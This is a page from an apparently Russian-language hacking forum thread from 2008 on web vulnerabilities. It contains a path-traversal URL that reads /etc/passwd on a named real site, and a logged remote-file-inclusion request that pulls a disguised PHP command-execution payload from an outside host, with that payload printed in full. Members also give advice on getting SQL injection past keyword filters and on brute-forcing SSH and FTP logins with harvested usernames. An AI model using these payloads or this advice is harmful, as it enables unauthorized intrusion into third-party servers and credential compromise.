HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1371  
Старый 24.03.2008, 12:42
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию

В разделе php инжекции нашел вот такой инжект -
Цитата:
http://www.bristolferry.com/page.php?xPage=../../../../../../../etc/passwd
Пытаюсь приконектится к серверу по SSH программой putty, login: root .
В putty логин ввести можно, а пароль даже не видно как вводит. Нажимаю Enter - пишет, что доступ закрыт. Подскажите пожалуйста, в чём проблема?
И еще, в passwd лежат пароли от пользователей?
 
Ответить с цитированием

  #1372  
Старый 24.03.2008, 13:24
xaker-boss
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094

Репутация: 120
Отправить сообщение для xaker-boss с помощью ICQ
По умолчанию

Подскажите что делает эта инекция?
Пытались применить её к vBulletin.
PHP код:
//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? 
Содержимое странички _http://www.entgiftungspad.de/cache/cmd7.gif
PHP код:
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo 
$eseguicmd;

function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}}
return 
$res;
}
exit;
 
Ответить с цитированием

  #1373  
Старый 24.03.2008, 13:54
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Spaise, в /etc/passwd пароли лежали в старых версиях ядер
Сейчас паролей там нет, а лежат они в /etc/shadow - если у тебя Линукс или Соларис, /etc/master.passwd - Если у тебя *BSD
Доступны они только руту

xaker-boss, вообше то это удалённый инклуд в компоненте Мамбо - com_mambowiki, хз как вы пытались его к Булке применить
 
Ответить с цитированием

  #1374  
Старый 24.03.2008, 14:04
xaker-boss
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094

Репутация: 120
Отправить сообщение для xaker-boss с помощью ICQ
По умолчанию

Spyder да эт не я пытался, а меня пытались ламанут, просто загленул в свой ЛОГ и у видел там это.
Спасибо
 
Ответить с цитированием

  #1375  
Старый 24.03.2008, 16:43
constanta
Познающий
Регистрация: 19.09.2007
Сообщений: 38
Провел на форуме:
424313

Репутация: 2
По умолчанию

Уважаемые господа. Не первый раз сталкиваюсь с такой бедой.
Запрос такого вида :
Цитата:
___http://site.com/lalala/download/download.cfm?companyid=lalala&fileid=lalala&fileke y='
Ошибка такого вида :
Цитата:
Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Syntax error converting from a character string to uniqueidentifier.
Вопрос: Что это такое. И где можно прочитать какое то описание, как правильно провести иньекцию.

С удовольствием выслушаю ваши советы.

P.S. И еще вопрос .
1. В MSSQL идет фильтрация на TOP и на From . если вместо TOP я могу еще поставить max то фром мне полюбому нужен.
Что можно сделать в этой ситуации?

Последний раз редактировалось constanta; 24.03.2008 в 16:48..
 
Ответить с цитированием

  #1376  
Старый 24.03.2008, 16:47
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

constanta ошибка типа sql-inj
читаем тут http://injection.rulezz.ru/
попробуй закодировать фром

Последний раз редактировалось ReVOLVeR; 24.03.2008 в 16:55..
 
Ответить с цитированием

  #1377  
Старый 24.03.2008, 16:47
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???
 
Ответить с цитированием

  #1378  
Старый 24.03.2008, 16:48
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

mff логины к ssh которые нередко подходят к фтп
узнать прова на сервере для определённого юзверя
используй для бруа к примеру на совпадение логина и пасса

Последний раз редактировалось ReVOLVeR; 24.03.2008 в 16:50..
 
Ответить с цитированием

  #1379  
Старый 24.03.2008, 17:19
zythar
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
Провел на форуме:
1595333

Репутация: 291


Отправить сообщение для zythar с помощью ICQ
По умолчанию

Цитата:
Сообщение от mff  
Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???
оттуда можно узнать имена пользователей которые существуют в системе.
 
Ответить с цитированием

  #1380  
Старый 24.03.2008, 17:28
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Спасибо вам ReVOLVeR zythar!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ